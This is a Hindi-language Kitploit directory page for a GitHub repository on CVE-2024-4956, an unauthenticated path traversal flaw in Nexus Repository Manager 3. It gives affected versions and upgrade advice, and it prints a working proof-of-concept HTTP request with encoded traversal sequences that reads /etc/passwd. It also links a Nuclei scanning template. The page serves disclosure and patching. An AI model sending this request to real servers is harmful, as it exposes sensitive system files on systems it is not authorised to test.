Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4956 — Nexus Repository 3 में बिना प्रमाणीकरण के Path Traversal | Kitploit
उपकरण/GitHubGitHub/erickfernandox/cve-2024-4956
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Nexus Repository 3 में बिना प्रमाणीकरण के Path Traversal

रिपॉजिटरी देखें
342 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4956 - Nexus Repository Manager 3 में बिना प्रमाणीकरण के पाथ ट्रैवर्सल

Nexus Repository Manager एक रिपॉजिटरी मैनेजर है जो विकास के लिए आवश्यक आर्टिफैक्ट्स को व्यवस्थित, संग्रहीत और वितरित करता है।

Nexus Repository 3 के 3.68.1 से पहले के संस्करणों में एक पाथ ट्रैवर्सल भेद्यता खोजी गई है। यह भेद्यता एक हमलावर को बिना किसी प्रमाणीकरण के Nexus Repository एप्लिकेशन के दायरे से बाहर के सिस्टम फ़ाइलों को डाउनलोड करने के लिए URL बनाने की अनुमति देती है। यह एक महत्वपूर्ण जोखिम उत्पन्न करती है, क्योंकि यह संवेदनशील सिस्टम फ़ाइलों को उजागर कर सकती है और संभावित रूप से उस वातावरण की सुरक्षा से समझौता कर सकती है जहाँ Nexus Repository स्थापित है।

इस भेद्यता को कम करने के लिए Nexus Repository को जल्द से जल्द संस्करण 3.68.1 या उसके बाद के संस्करण में अपडेट करने की अनुशंसा की जाती है।

भेद्यता के बारे में अधिक जानकारी और तकनीकी विवरण के लिए, कृपया निम्नलिखित लिंक देखें:

संदर्भ:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

प्रभावित संस्करण

यह भेद्यता Sonatype Nexus Repository Manager के संस्करण 3.0 से 3.68.0 तक को प्रभावित करती है।

शमन:

इस भेद्यता को समाप्त करने के लिए Nexus Repository को अपग्रेड करना अनुशंसित तरीका है। हालाँकि, उन परिनियोजनों के लिए तत्काल शमन विकल्प उपलब्ध हैं जो तुरंत अपग्रेड नहीं कर सकते:

संदर्भ:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

उपर्युक्त PoC के साथ, /etc/passwd फ़ाइल को एक्सेस किए जाने को देखना संभव है:

Nuclei टेम्पलेट

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

टूल डाउनलोड करें